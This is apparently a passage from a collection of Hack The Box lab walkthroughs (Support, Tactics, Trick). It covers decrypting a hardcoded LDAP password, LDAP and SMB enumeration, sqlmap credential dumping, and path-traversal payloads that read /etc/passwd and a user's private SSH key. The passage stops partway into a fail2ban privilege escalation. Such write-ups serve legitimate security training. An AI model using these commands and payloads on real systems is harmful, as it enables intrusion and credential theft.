    # enc_password function\n// UserInfo.Services.Protected\nusing System.Text;\n\nprivate static string enc_password = \"0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E\"\n
    # private static byte[] key\n// UserInfo.Services.Protected\nusing System.Text;\n\nprivate static byte[] key = Encoding.ASCII.GetBytes(\"armando\");\n

    With these two last elements, we can write a script to reverse the function getPassword() and ultimately obtain the password used for \"support\" user to access the Active Directory.

    Save the script as script.py and this content:

    import base64\n\nenc_password = \"0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E\"\nkey = b'armando'\n\narray = base64.b64decode(enc_password)\narray2 = ''\nfor i in range(len(array)):\n    array2 += chr(array[i] ^ key[i%len(key)] ^ 223)\n\nprint(array2)\n\u00b4\u00b4\u00b4\n\nNow, give script.py execution permissions and run it:\n\n```bash\nchmod +x script.py\npython script.py\n

    Decrypted password would be: nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz

    Before going on, there is another way to get the password besides writing this python script. One of them, for instance, would involve:

    1. Opening a windows machine in the tun0 network range.
    2. Opening wireshark and capturing tun0 interface.
    3. Running the executable UserInfo.exe from the windows machine.
    4. Examining in wireshark the LDAP authentication packet (Follow TCP Stream in a request to port 389).

    Summing up, we have:

    • user: support
    • password: nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
    • ldap directory: support.htb

    Now we can use a tool such as ldapsearch to open a connection to the LDAP server, bind, and perform a search using specified parameters, like:

    -b searchbase   Use searchbase as the starting point for the search instead of the default.\n-x      Use simple authentication instead of SASL.\n-D binddn   Use the Distinguished Name binddn to bind to the LDAP directory.  For SASL binds, the server is expected to ignore this value.\n-w passwd       Use passwd as the password for simple authentication.\n-H ldapuri  Specify  URI(s)  referring  to  the  ldap  server(s); a list of URI, separated by whitespace or commas is expected\n

    Using ldapsearch, we run:

    # # ldapsearch -x -H ldap://$ip -D '<DOMAIN>\\<username>' -w '<password>' -b \"CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>\"\n\nldapsearch -x -H ldap://support.htb -D 'support\\ldap' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b \"CN=Users,DC=support,DC=htb\"\n

    Results are long and provided in text form. By using a tool such as ldapdomaindump we can get cool results in different formats: .grep, .html, and .json.

     ldapdomaindump -u 'support\\ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' dc.support.htb\n

    Then, we can run:

    firefox domain_users.html\n

    Results:

    It looks like the support user account has the most permissions. We have a closer look to this user in the results obtained in the ldapsearch:

    # support, Users, support.htb\ndn: CN=support,CN=Users,DC=support,DC=htb\nobjectClass: top\nobjectClass: person\nobjectClass: organizationalPerson\nobjectClass: user\ncn: support\nc: US\nl: Chapel Hill\nst: NC\npostalCode: 27514\ndistinguishedName: CN=support,CN=Users,DC=support,DC=htb\ninstanceType: 4\nwhenCreated: 20220528111200.0Z\nwhenChanged: 20221109173336.0Z\nuSNCreated: 12617\ninfo: Ironside47pleasure40Watchful\nmemberOf: CN=Shared Support Accounts,CN=Users,DC=support,DC=htb\nmemberOf: CN=Remote Management Users,CN=Builtin,DC=support,DC=htb\nuSNChanged: 81981\ncompany: support\nstreetAddress: Skipper Bowles Dr\nname: support\nobjectGUID:: CqM5MfoxMEWepIBTs5an8Q==\nuserAccountControl: 66048\nbadPwdCount: 0\ncodePage: 0\ncountryCode: 0\nbadPasswordTime: 0\nlastLogoff: 0\nlastLogon: 0\npwdLastSet: 132982099209777070\nprimaryGroupID: 513\nobjectSid:: AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEILUQQAAA==\naccountExpires: 9223372036854775807\nlogonCount: 0\nsAMAccountName: support\nsAMAccountType: 805306368\nobjectCategory: CN=Person,CN=Schema,CN=Configuration,DC=support,DC=htb\ndSCorePropagationData: 20220528111201.0Z\ndSCorePropagationData: 16010101000000.0Z\nlastLogonTimestamp: 133124888166969633\n

    There! Usually, the field \"Info\" is left empty but in this case, you can read: \"Ironside47pleasure40Watchful\", which might be a credential. Assuming that it is, we are going to enumerate user information in AD through the LDAP protocol. And for that, there exists a tool called evil-winrm.

    What does evil-winrm do? evil-winrm is a WinRM shell for hacking/penthesting purposes.

    And what is WinRM? WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators. Download evil-winrm repo here.

    Run:

    evil-winrm -i dc.support.htb -u support -p \"Ironside47pleasure40Watchful\"\n

    And we will connect to a powershell terminal: PS C:\\Users\\support\\Documents

    To get the user.txt flag, run:

    cd ..\ndir\ncd Desktop\ndir\ntype user.txt\n

    Result:

    561ec390613a0f53b431d3e14e923de6\n
    ","tags":["walkthrough"]},{"location":"htb-support/#getting-the-systems-flag","title":"Getting the System's flag","text":"

    Coming soon.

    ","tags":["walkthrough"]},{"location":"htb-support/#tools-in-this-lab","title":"Tools in this lab","text":"

    Before going through this write-up, you may have a look at some tools needed to solve it in case you prefer to investigate them and try harder instead of reading directly the solution.

    kerbrute

    Created by ropnop. Download repo. A tool to quickly bruteforce and enumerate valid Active Directory accounts through Kerberos Pre-Authentication.

    Nicely done in go, so to install it first you need to make sure that go is installed. Otherwise, run:

    sudo apt update && sudo apt install golang\n

    Then, follow the instructions from the repo.

    enum4linux

    Preinstalled in a kali machine. Tool to exploit null sessions by using some PERL scripts. Some cool commands here:

    # enumerates shares\nenum4linux -S $ip\n\n# enumerates users\nenum4linux -U $ip\nenum4linux -M $ip     // enumerates machine list\nenum4linux -enuP $ip   // displays the password policy in case you need to mount a network authentification attack\nenum4linux -u $ip     // specify username to use (default \u201c\u201d)\nenum4linux -p $ip    // specify password to use (default \u201c\u201d)\nenum4linux -s /usr/share/enum4linux/share-list.txt $ip    // Also you can use brute force by adding a file\n

    dnspy

    Created by a bunch of contributors. Download the repo. dnSpy is a debugger and .NET assembly editor. You can use it to edit and debug assemblies even if you don't have any source code available. There is a but: this tool is for windows

    To install, open powershell in windows and run:

    git clone --recursive https://github.com/dnSpy/dnSpy.git\ncd dnsSpy\nbuild.ps1 -NoMbuild\n

    ILSpy

    Open source alternative for dnspy. Download from repo; ILSpy. To install ILSpy, you need to install some dependencies like: .NET 6.0 SDK, Avalonia, dotnet... Install what you are asked and when done, run:

    cd ~/tools/AvaloniaILSpy/artifacts/linux-x64\n./ILSpy\n
    ","tags":["walkthrough"]},{"location":"htb-support/#what-i-learned","title":"What I learned","text":"

    When doing Support Machine I was faced with some challenging missions:

    Enumerating shares as part of a Null session attack.

    A null session attack exploits an authentification vulnerability for Windows Administrative Shares. This lets an attacker connect to a local or remote share without authentification. Therefore, it lets an attacker enumerate precious info such as passwords, system users, system groups, running system processes... The challenge here was to choose the best-suited tools to perform this enumeration. On my mental repo, I had:

    • Samba suite
    • Enum4linux

    But there is also a nmap script for smb enumeration.

    Finding a .NET decompiler for Linux

    There are well-known decompilers out there. For windows you have dnSpy and many more. In linux you have the open source ILSpy. BUT: Installation required some dependencies. There were more tools (wine).

    Ldap enumerating tools

    ldap-utils are preinstalled in kali, but before this lab, I didn't have had the chance to try them out.

    ldapsearch

    Syntax:

    ldapsearch -x -H ldap://$ip -D '<DOMAIN>\\<username>' -w '<password>' -b \"CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>\"\n

    An example:

    ldapsearch -x -H ldap://dc.support.htb -D 'SUPPORT\\ldap' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b \"CN=Users,DC=SUPPORT,DC=HTB\" | tee ldap_dc.support.htb.txt\n

    ldapdomaindump

    I have enjoyed this tool for real! It's pretty straightforward and you get legible results. An example of how to run it:

    ldapdomaindump -u 'support\\ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' dc.support.htb\n
    ","tags":["walkthrough"]},{"location":"htb-tactics/","title":"Tactics - A HackTheBox machine","text":"
    nmap -sC -A 10.129.228.98  -Pn -p-\n

    Results:

    PORT    STATE SERVICE       VERSION\n135/tcp open  msrpc         Microsoft Windows RPC\n139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn\n445/tcp open  microsoft-ds?\nService Info: OS: Windows; CPE: cpe:/o:microsoft:windows\n\nHost script results:\n|_clock-skew: -5s\n| p2p-conficker: \n|   Checking for Conficker.C or higher...\n|   Check 1 (port 7476/tcp): CLEAN (Timeout)\n|   Check 2 (port 63095/tcp): CLEAN (Timeout)\n|   Check 3 (port 16465/udp): CLEAN (Timeout)\n|   Check 4 (port 43695/udp): CLEAN (Timeout)\n|_  0/4 checks are positive: Host is CLEAN or ports are blocked\n| smb2-security-mode: \n|   311: \n|_    Message signing enabled but not required\n| smb2-time: \n|   date: 2023-05-02T10:26:04\n|_  start_date: N/A\n

    Interesting part here is

    smb2-security-mode: \n|   311: \n|_    Message signing enabled but not required\n

    This will allow us to use smbclient share enumeration withouth the need of providing a password when signing into the shared folder. For that we will use a well known user in Windows: Administrator.

    smbclient -L 10.129.228.98 -U Administrator\n

    Results:

            Sharename       Type      Comment\n        ---------       ----      -------\n        ADMIN$          Disk      Remote Admin\n        C$              Disk      Default share\n        IPC$            IPC       Remote IPC\n
    smbclient \\\\\\\\10.129.228.98\\\\C$ -U Administrator\n

    Flag is located at:

    \\Users\\Administrator\\Desktop\\>flag.txt \n
    ","tags":["walkthrough","windows","smb","port 445"]},{"location":"htb-trick/","title":"Walkthrough - Trick, a Hack The Box machine","text":"","tags":["walkthrough"]},{"location":"htb-trick/#about-the-machine","title":"About the machine","text":"data Machine Trick Platform Hackthebox url link creator Geiseric OS Linux Release data 18 June 2022 Difficulty Easy Points 20 ip 10.10.11.166","tags":["walkthrough"]},{"location":"htb-trick/#recon","title":"Recon","text":"

    First, we run:

    export ip=10.10.11.166\n
    ","tags":["walkthrough"]},{"location":"htb-trick/#service-port-enumeration","title":"Service/ Port enumeration","text":"

    Run nmap to enumerate open ports, services, OS and traceroute

    General enumeration not to make too much noise:

    sudo nmap $ip -Pn\n

    Results:

    Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-19 13:31 EDT\nNmap scan report for trick.htb (10.10.11.166)\nHost is up (0.15s latency).\nNot shown: 996 closed tcp ports (reset)\nPORT   STATE SERVICE\n22/tcp open  ssh\n25/tcp open  smtp\n53/tcp open  domain\n80/tcp open  http\n

    Once you know open ports, run nmap to see service versions and more details:

    nmap -sCV -p22,80,53,25 -oN targeted $ip\n

    Results:

    PORT   STATE SERVICE VERSION\n22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)\n| ssh-hostkey:\n|   2048 61:ff:29:3b:36:bd:9d:ac:fb:de:1f:56:88:4c:ae:2d (RSA)\n|   256 9e:cd:f2:40:61:96:ea:21:a6:ce:26:02:af:75:9a:78 (ECDSA)\n|_  256 72:93:f9:11:58:de:34:ad:12:b5:4b:4a:73:64:b9:70 (ED25519)\n25/tcp open  smtp    Postfix smtpd\n|_smtp-commands: debian.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING\n53/tcp open  domain  ISC BIND 9.11.5-P4-5.1+deb10u7 (Debian Linux)\n| dns-nsid:\n|_  bind.version: 9.11.5-P4-5.1+deb10u7-Debian\n80/tcp open  http    nginx 1.14.2\n|_http-title: Coming Soon - Start Bootstrap Theme\n|_http-server-header: nginx/1.14.2\nService Info: Host:  debian.localdomain; OS: Linux; CPE: cpe:/o:linux:linux_kernel\n
    ","tags":["walkthrough"]},{"location":"htb-trick/#directory-enumeration","title":"Directory enumeration","text":"

    We can use gobuster to enumerate directories:

    gobuster dir -u $ip -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt\n
    ","tags":["walkthrough"]},{"location":"htb-trick/#dns-enumeration","title":"dns enumeration","text":"

    Run:

    dnslookup\n

    And after that:

    > SERVER 10.10.11.166\n

    Results:

    Default server: 10.10.11.166\nAddress: 10.10.11.166#53\n

    Then, we run:

    > 10.10.11.166\n

    And as a result, we have:

    166.11.10.10.in-addr.arpa       name = trick.htb.\n

    Now we have a dns name: trick.htb. We can dig it with:

    dig trick.htb axfr @10.10.11.166\n

    And the results:

    ; <<>> DiG 9.18.6-2-Debian <<>> trick.htb axfr @10.10.11.166\n;; global options: +cmd\ntrick.htb.              604800  IN      SOA     trick.htb. root.trick.htb. 5 604800 86400 2419200 604800\ntrick.htb.              604800  IN      NS      trick.htb.\ntrick.htb.              604800  IN      A       127.0.0.1\ntrick.htb.              604800  IN      AAAA    ::1\npreprod-payroll.trick.htb. 604800 IN    CNAME   trick.htb.\ntrick.htb.              604800  IN      SOA     trick.htb. root.trick.htb. 5 604800 86400 2419200 604800\n;; Query time: 96 msec\n;; SERVER: 10.10.11.166#53(10.10.11.166) (TCP)\n;; WHEN: Wed Oct 19 13:20:24 EDT 2022\n;; XFR size: 6 records (messages 1, bytes 231)\n

    Finally we have these dns domains: + trick.htb + preprod-payroll.trick.htb + root.trick.htb

    ","tags":["walkthrough"]},{"location":"htb-trick/#edit-etchosts-file","title":"Edit /etc/hosts file","text":"

    We add the given subdomain to our /etc/hosts file. First we open the /etc/hosts file with an editor. For instance, nano.

    sudo nano /etc/hosts\n
    We move the cursor to the end and we add these lines:

    10.10.11.166    trick.htb\n10.10.11.166    preprod-payroll.trick.htb\n10.10.11.166    root.trick.htb\n

    Now we can use the browser to go to: http://preprod-payroll.trick.htb

    And start again with directory enumeration.

    ","tags":["walkthrough"]},{"location":"htb-trick/#directory-enumeration_1","title":"Directory enumeration","text":"

    Run the dictionary:

    gobuster dir -u http://preprod-payroll.trick.htb -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt\n

    Results:

    Dirs found with a 302 response:\n\n/\n\nDirs found with a 403 response:\n\n/assets/\n/database/\n/assets/vendor/\n/assets/img/\n/assets/vendor/jquery/\n/assets/DataTables/\n/assets/vendor/bootstrap/\n/assets/vendor/bootstrap/js/\n/assets/vendor/jquery.easing/\n/assets/css/\n/assets/vendor/php-email-form/\n/assets/vendor/venobox/\n/assets/vendor/waypoints/\n/assets/vendor/counterup/\n/assets/vendor/owl.carousel/\n/assets/vendor/bootstrap-datepicker/\n/assets/vendor/bootstrap-datepicker/js/\n/assets/js/\n/assets/font-awesome/\n/assets/font-awesome/js/\n/assets/vendor/owl.carousel/assets/\n/assets/vendor/bootstrap/css/\n/assets/vendor/bootstrap-datepicker/css/\n/assets/font-awesome/css/\n/assets/vendor/bootstrap-datepicker/locales/\n/assets/font-awesome/less/\n\n\n--------------------------------\nFiles found during testing:\n\nFiles found with a 302 responce:\n\n/index.php\n\nFiles found with a 200 responce:\n\n/login.php\n/home.php\n/header.php\n/users.php\n/ajax.php\n/navbar.php\n/assets/vendor/jquery/jquery.min.js\n/assets/DataTables/datatables.min.js\n/assets/vendor/bootstrap/js/bootstrap.bundle.min.js\n/assets/vendor/jquery.easing/jquery.easing.min.js\n/assets/vendor/php-email-form/validate.js\n/assets/vendor/venobox/venobox.min.js\n/assets/vendor/waypoints/jquery.waypoints.min.js\n/assets/vendor/counterup/counterup.min.js\n/assets/vendor/owl.carousel/owl.carousel.min.js\n/assets/js/select2.min.js\n/assets/vendor/bootstrap-datepicker/js/bootstrap-datepicker.min.js\n/assets/js/jquery.datetimepicker.full.min.js\n/assets/js/jquery-te-1.4.0.min.js\n/assets/font-awesome/js/all.min.js\n/department.php\n/topbar.php\n/position.php\n/employee.php\n/payroll.php\n

    In http://preprod-payroll.trick.htb/users.php there is this info:

    name: Administrator\nusername: Enemigosss\n
    ","tags":["walkthrough"]},{"location":"htb-trick/#exploiting-a-sql-injection-vulnerability","title":"Exploiting a sql injection vulnerability","text":"

    If we have a look at the forms at http://preprod-payroll.trick.htb/login.php and run sqlmap, we'll see that it is vulnerable to SQL injection - Blind.

    We can extract databases:

    sqlmap -r login --dbs\n

    Results:

    available databases [2]:\n[*] information_schema\n[*] payroll_db\n

    Now, we extract tables from payroll_db database:

    sqlmap -r login -D payroll_db --tables\n

    Results:

    Database: payroll_db\n[11 tables]\n+---------------------+\n| position            |\n| allowances          |\n| attendance          |\n| deductions          |\n| department          |\n| employee            |\n| employee_allowances |\n| employee_deductions |\n| payroll             |\n| payroll_items       |\n| users               |\n+---------------------+\n

    Next, we get columns from the users table:

    sqlmap -r login -D payroll_db -T users --columns\n

    Results:

    Database: payroll_db\nTable: users\n[8 columns]\n+-----------+--------------+\n| Column    | Type         |\n+-----------+--------------+\n| address   | text         |\n| contact   | text         |\n| doctor_id | int(30)      |\n| id        | int(30)      |\n| name      | varchar(200) |\n| password  | varchar(200) |\n| type      | tinyint(1)   |\n| username  | varchar(100) |\n+-----------+--------------+\n

    And finally we can get usernames and passwords:

    sqlmap -r login -D payroll_db -T users -C username,password --dump\n

    Results:

    Database: payroll_db\nTable: users\n[1 entry]\n+------------+-----------------------+\n| username   | password              |\n+------------+-----------------------+\n| Enemigosss | SuperGucciRainbowCake |\n+------------+-----------------------+\n

    We can login at http://preprod-payroll.trick.htb and see an administration pannel, but other than information disclosure, we cannot find a vuln to get into the server.

    ","tags":["walkthrough"]},{"location":"htb-trick/#dns-fuzzing","title":"DNS fuzzing","text":"

    Since the subdomain name (http://preprod-payroll.trick.htb/) looks interesting as \u201cpayroll\u201d can be replaced with another word, we can consider fuzzing it. Firstly, we will need to figure out the non-existence subdomain query\u2019s error response size. Then we fuzz for a subdomain.

    curl -s -H \"Host: nonexistent.trick.htb\" https://trick.htb | wc -c\n

    And it returns 5480, which is the filter that we will use in th ffuz command.

    Now we can keep on enumerating subdomains with ffuz:

    ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000-trick.txt -u http://trick.htb -H \u201cHost: FUZZ.trick.htb\u201d -fs 5480\n

    If we add -fs 5480 to the command this will filter out the responses that are 5480 bytes in length (which are non-existent subdomains) and we can pinpoint what is a real finding.

    ffuf -H \"Host: preprod-FUZZ.trick.htb\" -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u http://10.10.11.166 -fs 5480\n

    Adding the filter reveals a new subdomain called preprod-marketing. Results:

            /'___\\  /'___\\           /'___\\       \n       /\\ \\__/ /\\ \\__/  __  __  /\\ \\__/       \n       \\ \\ ,__\\\\ \\ ,__\\/\\ \\/\\ \\ \\ \\ ,__\\      \n        \\ \\ \\_/ \\ \\ \\_/\\ \\ \\_\\ \\ \\ \\ \\_/      \n         \\ \\_\\   \\ \\_\\  \\ \\____/  \\ \\_\\       \n          \\/_/    \\/_/   \\/___/    \\/_/       \n\n       v1.5.0 Kali Exclusive <3\n________________________________________________\n\n :: Method           : GET\n :: URL              : http://10.10.11.166\n :: Wordlist         : FUZZ: /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt\n :: Header           : Host: preprod-FUZZ.trick.htb\n :: Follow redirects : false\n :: Calibration      : false\n :: Timeout          : 10\n :: Threads          : 40\n :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500\n :: Filter           : Response size: 5480\n________________________________________________\n\nmarketing               [Status: 200, Size: 9660, Words: 3007, Lines: 179, Duration: 267ms]\npc169                   [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 212ms]\npayroll                 [Status: 302, Size: 9546, Words: 1453, Lines: 267, Duration: 116ms]\n77msccom                [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 183ms\n
    ","tags":["walkthrough"]},{"location":"htb-trick/#edit-etchosts-file_1","title":"Edit /etc/hosts file","text":"

    We add the given subdomain to our /etc/hosts file. First we open the /etc/hosts file with an editor. For instance, nano.

    sudo nano /etc/hosts\n

    We move the cursor to the end and we add these lines:

    10.10.11.166    preprod-marketing.trick.htb\n

    We introduce the address into the browser and we can see a website. In one of the pages there is a path traversal vulnerability:

    http://preprod-marketing.trick.htb/index.php?page=..././..././..././..././..././etc/passwd\n

    Results:

    root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n_apt:x:100:65534::/nonexistent:/usr/sbin/nologin\nsystemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin\nsystemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin\nsystemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin\nmessagebus:x:104:110::/nonexistent:/usr/sbin/nologin\ntss:x:105:111:TPM2 software stack,,,:/var/lib/tpm:/bin/false\ndnsmasq:x:106:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin\nusbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin\nrtkit:x:108:114:RealtimeKit,,,:/proc:/usr/sbin/nologin\npulse:x:109:118:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin\nspeech-dispatcher:x:110:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false\navahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin\nsaned:x:112:121::/var/lib/saned:/usr/sbin/nologin\ncolord:x:113:122:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin\ngeoclue:x:114:123::/var/lib/geoclue:/usr/sbin/nologin\nhplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false\nDebian-gdm:x:116:124:Gnome Display Manager:/var/lib/gdm3:/bin/false\nsystemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin\nmysql:x:117:125:MySQL Server,,,:/nonexistent:/bin/false\nsshd:x:118:65534::/run/sshd:/usr/sbin/nologin\npostfix:x:119:126::/var/spool/postfix:/usr/sbin/nologin\nbind:x:120:128::/var/cache/bind:/usr/sbin/nologin\nmichael:x:1001:1001::/home/michael:/bin/bash\n

    Now, we can infer somehow that in /home/michael we can find a .ssh folder with teh id_rsa public ssh signature. To download it, we can use burp and capture this petition:

    http://preprod-marketing.trick.htb/index.php?page=..././..././..././..././..././home/michael/.ssh/id_rsa\n

    As a result, we can download michael's public key to login via ssh:

    HTTP/1.1 200 OK\nServer: nginx/1.14.2\nDate: Thu, 20 Oct 2022 08:25:41 GMT\nContent-Type: text/html; charset=UTF-8\nConnection: close\nContent-Length: 1823\n\n-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAQEAwI9YLFRKT6JFTSqPt2/+7mgg5HpSwzHZwu95Nqh1Gu4+9P+ohLtz\nc4jtky6wYGzlxKHg/Q5ehozs9TgNWPVKh+j92WdCNPvdzaQqYKxw4Fwd3K7F4JsnZaJk2G\nYQ2re/gTrNElMAqURSCVydx/UvGCNT9dwQ4zna4sxIZF4HpwRt1T74wioqIX3EAYCCZcf+\n4gAYBhUQTYeJlYpDVfbbRH2yD73x7NcICp5iIYrdS455nARJtPHYkO9eobmyamyNDgAia/\nUkn75SroKGUMdiJHnd+m1jW5mGotQRxkATWMY5qFOiKglnws/jgdxpDV9K3iDTPWXFwtK4\n1kC+t4a8sQAAA8hzFJk2cxSZNgAAAAdzc2gtcnNhAAABAQDAj1gsVEpPokVNKo+3b/7uaC\nDkelLDMdnC73k2qHUa7j70/6iEu3NziO2TLrBgbOXEoeD9Dl6GjOz1OA1Y9UqH6P3ZZ0I0\n+93NpCpgrHDgXB3crsXgmydlomTYZhDat7+BOs0SUwCpRFIJXJ3H9S8YI1P13BDjOdrizE\nhkXgenBG3VPvjCKiohfcQBgIJlx/7iABgGFRBNh4mVikNV9ttEfbIPvfHs1wgKnmIhit1L\njnmcBEm08diQ716hubJqbI0OACJr9SSfvlKugoZQx2Iked36bWNbmYai1BHGQBNYxjmoU6\nIqCWfCz+OB3GkNX0reINM9ZcXC0rjWQL63hryxAAAAAwEAAQAAAQASAVVNT9Ri/dldDc3C\naUZ9JF9u/cEfX1ntUFcVNUs96WkZn44yWxTAiN0uFf+IBKa3bCuNffp4ulSt2T/mQYlmi/\nKwkWcvbR2gTOlpgLZNRE/GgtEd32QfrL+hPGn3CZdujgD+5aP6L9k75t0aBWMR7ru7EYjC\ntnYxHsjmGaS9iRLpo79lwmIDHpu2fSdVpphAmsaYtVFPSwf01VlEZvIEWAEY6qv7r455Ge\nU+38O714987fRe4+jcfSpCTFB0fQkNArHCKiHRjYFCWVCBWuYkVlGYXLVlUcYVezS+ouM0\nfHbE5GMyJf6+/8P06MbAdZ1+5nWRmdtLOFKF1rpHh43BAAAAgQDJ6xWCdmx5DGsHmkhG1V\nPH+7+Oono2E7cgBv7GIqpdxRsozETjqzDlMYGnhk9oCG8v8oiXUVlM0e4jUOmnqaCvdDTS\n3AZ4FVonhCl5DFVPEz4UdlKgHS0LZoJuz4yq2YEt5DcSixuS+Nr3aFUTl3SxOxD7T4tKXA\nfvjlQQh81veQAAAIEA6UE9xt6D4YXwFmjKo+5KQpasJquMVrLcxKyAlNpLNxYN8LzGS0sT\nAuNHUSgX/tcNxg1yYHeHTu868/LUTe8l3Sb268YaOnxEbmkPQbBscDerqEAPOvwHD9rrgn\nIn16n3kMFSFaU2bCkzaLGQ+hoD5QJXeVMt6a/5ztUWQZCJXkcAAACBANNWO6MfEDxYr9DP\nJkCbANS5fRVNVi0Lx+BSFyEKs2ThJqvlhnxBs43QxBX0j4BkqFUfuJ/YzySvfVNPtSb0XN\njsj51hLkyTIOBEVxNjDcPWOj5470u21X8qx2F3M4+YGGH+mka7P+VVfvJDZa67XNHzrxi+\nIJhaN0D5bVMdjjFHAAAADW1pY2hhZWxAdHJpY2sBAgMEBQ==\n-----END OPENSSH PRIVATE KEY-----\n

    Now we save it with the name we want and change its permissions:

    nano key\n# CTRl-MAY V to paste it\n# CTRL-X, Yes and ENTER to save the buffer and exit\nsudo chmod 400 key\n

    And we can login as michael:

    ssh -i key michael@10.10.11.166\n

    In /home/michael we have the user flag: user.txt.

    ","tags":["walkthrough"]},{"location":"htb-trick/#escalation-of-privileges","title":"Escalation of privileges","text":"

    Getting the system flag. Check michael's groups:

    id\n

    Results:

    uid=1001(michael) gid=1001(michael) groups=1001(michael),1002(security)\n

    Check michael's permissions:

    sudo -l\n

    Results:

    Matching Defaults entries for michael on trick:\n    env_reset, mail_badpass,\n    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\n\nUser michael may run the following commands on trick:\n    (root) NOPASSWD: /etc/init.d/fail2ban restart\n

    Interesting part here is that michael may run fail2ban command as root without any password. This is due to a misconfiguration and we can exploit it.

    For starters, michael has writing permissions over the configuration files located in /etc/fail2ban/action.d

    Run:

    ls -la /etc/fail2ban\n

    And we can see michael, as part of the security group has rwx rights on the directory owned by root:

    ...\ndrwxrwx---   2 root security  4096 Oct 20 11:03 action.d\n...\n

    Now we need to understand what fail2ban is and how it works. fail2ban is a great IDPS tool, not only it can detect attacks but also block malicious IP addresses by using Linux iptables. Although fail2ban can be used for services like HTTP, SMTP, IMAP, etc. most sys-admins use it to protect the SSH service. fail2ban daemon reads the log files and if there is a malicious pattern detected (e.g multiple failed login requests) it executes a command for blocking the IP for a certain period of time or maybe forever.

    In the file /etc/fail2ban/jail.conf, we can spot some customizations such as ban time and maxretry:

    cat /etc/fail2ban/jail.conf\n

    And we see that bantime is limited to 10 seconds and maximum of retries to 5:

    # \"bantime\" is the number of seconds that a host is banned.\nbantime  = 10s\n\n# A host is banned if it has generated \"maxretry\" during the last \"findtime\"\n# seconds.\nfindtime  = 10s\n\n# \"maxretry\" is the number of failures before a host gets banned.\nmaxretry = 5\n

    This means that if we retry ssh connection six times (so we exceed the maxretry parameter), the file /etc/fail2ban/action.d/iptables-multiport.conf will be executed as root, and as a consequence, our host will be banned. Now, as part of the security group michael does have rwx permissions on the parent folder /etc/fail2ban/action.d, but not on the file /etc/fail2ban/action.d/iptables-multiport.conf:

    ls -la /etc/fail2ban/action.d/iptables-multiport.conf\n

    Result:

    -rw-r--r-- 1 root root 1420 Oct 20 12:48 iptables-multiport.conf\n

    We need then, to be able to edit that file to include our malicious code. As the service fail2ban is restarted every minute or so, you need to execute the following commands quickly. They will allow you to overwrite the file /etc/fail2ban/action.d/iptables-multiport.conf:

